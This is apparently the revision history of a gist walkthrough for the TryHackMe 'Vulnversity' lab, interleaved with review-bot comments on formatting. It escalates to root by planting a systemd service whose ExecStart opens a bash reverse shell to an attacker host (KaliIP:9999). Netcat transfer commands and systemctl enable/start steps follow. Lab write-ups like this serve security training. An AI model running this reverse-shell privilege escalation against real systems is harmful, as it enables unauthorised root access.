Revisions
Alvin Smith revised this gist
Feb 2, 2021 . 1 changed file with 2 additions and 1 deletion.
@@ -1,4 +1,5 @@ # For better reading experience https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation ### 0. Prepare your payload `root.service` ```
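Review bot: The line `# For better reading experience https://alvinsmith.gitbook.io/...` at the top of this hunk starts with a single `#`, so Markdown renders the whole sentence and its URL as the page's H1 title, above the `### 0.` step heading. Drop the `#` and make it a plain sentence or a labelled link, so the numbered steps remain the top of the outline.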
Alvin Smith revised this gist
Feb 2, 2021 . 1 changed file with 1 addition and 0 deletions.
@@ -46,6 +46,7 @@ Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service ### 5. The listening 9999 would give you the root Expand Knowlege https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/
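Review bot: `Expand Knowlege` in this hunk is misspelled ("Knowledge") and sits as plain text directly under `### 5.`, so the reference URLs that follow read as part of step 5. Give the references their own heading at the same level as the steps and list each URL as a bullet item.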
Alvin Smith revised this gist
Feb 2, 2021 . 1 changed file with 4 additions and 4 deletions.
@@ -21,7 +21,7 @@ or ``` find -type d -maxdepth 2 -writable ``` ### 2. Transfter the payload(There might be other ways) ###### Init the target listening the port ``` nc -vl 44444 > root.service @@ -30,11 +30,11 @@ nc -vl 44444 > root.service ``` nc -n TargetIP 44444 < root.service ``` ### 3. Start listening on the 9999 ``` nc -lvnp 9999 ``` ### 4. Execute the payload(assume the file is under /var/tmp) ``` /bin/systemctl enable /var/tmp/root.service Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service @@ -43,7 +43,7 @@ Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service ``` /bin/systemctl start root ``` ### 5. The listening 9999 would give you the root Expand Knowlege https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory
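Review bot: In the block under `### 4. Execute the payload(assume the file is under /var/tmp)`, the command `/bin/systemctl enable /var/tmp/root.service` and its two `Created symlink from ...` output lines share one fence with no prompt marker, so a reader cannot tell what is typed from what is printed. Put the output in its own block or prefix the command with a prompt. While the headings are being promoted to `###`, `### 5. The listening 9999 would give you the root` is worth rewording too, since it describes a result rather than a step.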
Alvin Smith revised this gist
Feb 2, 2021 . 1 changed file with 1 addition and 1 deletion.
@@ -13,7 +13,7 @@ ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1' [Install] WantedBy=multi-user.target ``` ### 1. Find a files/directories that writable ``` find -type f -maxdepth 2 -writable ```
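Review bot: The heading `### 1. Find a files/directories that writable` is ungrammatical; "Find writable files/directories" says the same thing. The command under it, `find -type f -maxdepth 2 -writable`, also has no starting path and places `-maxdepth` after `-type`, which GNU find warns about because `-maxdepth` is a global option. Write the path explicitly and put `-maxdepth 2` first.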
Alvin Smith revised this gist
Feb 2, 2021 . 1 changed file with 1 addition and 1 deletion.
@@ -1,6 +1,6 @@ Practice box https://tryhackme.com/room/vulnversity ### 0. Prepare your payload `root.service` ``` [Unit] Description=roooooooooot
Alvin Smith revised this gist
Feb 2, 2021 . 1 changed file with 15 additions and 10 deletions.
@@ -1,10 +1,4 @@ Practice box https://tryhackme.com/room/vulnversity 0. Prepare your payload `root.service` ``` @@ -19,11 +13,15 @@ ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1' [Install] WantedBy=multi-user.target ``` 1. Find a files/directories that writable ``` find -type f -maxdepth 2 -writable ``` or ``` find -type d -maxdepth 2 -writable ``` 2. Transfter the payload(There might be other ways) ###### Init the target listening the port ``` nc -vl 44444 > root.service @@ -45,4 +43,11 @@ Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service ``` /bin/systemctl start root ``` 5. The listening 9999 would give you the root Expand Knowlege https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/ https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
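Review bot: The steps never state the precondition they depend on. The pasted output `Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service` requires write access to `/etc/systemd/system`, which an unprivileged user does not normally have, and the only hint is the title of the linked article about misconfigured systemctl permissions. Add a sentence before step 0 naming that misconfiguration, so a reader knows what the walkthrough relies on and what to audit on their own hosts.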
Alvin Smith revised this gist
Jan 12, 2021 . 1 changed file with 2 additions and 0 deletions.
@@ -4,6 +4,8 @@ https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/ https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49 practice box https://tryhackme.com/room/vulnversity 0. Prepare your payload `root.service` ``` [Unit]
Alvin Smith renamed this gist
Jun 1, 2020 . 1 changed file with 0 additions and 0 deletions.
File renamed without changes.
Alvin Smith revised this gist
Jun 1, 2020 . 1 changed file with 4 additions and 2 deletions.
@@ -1,5 +1,7 @@ https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/ https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49 0. Prepare your payload `root.service` @@ -20,11 +22,11 @@ WantedBy=multi-user.target find -type f -maxdepth 2 -writable ``` 2. Transfter the payload ###### Init the target listening the port ``` nc -vl 44444 > root.service ``` ###### Send file to traget ``` nc -n TargetIP 44444 < root.service ```
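Review bot: Two of the headings in the second hunk are misspelled: `2. Transfter the payload` ("Transfer") and `###### Send file to traget` ("target"). The `######` sub-headings also sit directly under a plain numbered line, so they render as sixth-level headings with no parent level; a bold label or a sub-list would keep the two netcat commands visibly inside step 2.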
Alvin Smith created this gist
Jun 1, 2020
@@ -0,0 +1,44 @@ https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/ https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49 0. Prepare your payload `root.service` ``` [Unit] Description=roooooooooot [Service] Type=simple User=root ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1' [Install] WantedBy=multi-user.target ``` 1. Find a directory that could write files ``` find -type f -maxdepth 2 -writable ``` 2. Transfter the payload #### Init the target listening the port ``` nc -vl 44444 > root.service ``` #### Send file to traget ``` nc -n TargetIP 44444 < root.service ``` 3. Start listening on the 9999 ``` nc -lvnp 9999 ``` 4. Execute the payload(assume the file is under /var/tmp) ``` /bin/systemctl enable /var/tmp/root.service Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service ``` ``` /bin/systemctl start root ``` 5. listening on [any] 9999... now you get the root
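Review bot: Step 1's heading and command disagree. The heading reads `1. Find a directory that could write files`, but the command is `find -type f -maxdepth 2 -writable`, and `-type f` matches regular files only, so it never lists a directory. Either reword the heading to say files or use `-type d`. The three bare URLs at the top would also be clearer under a short label saying they are references.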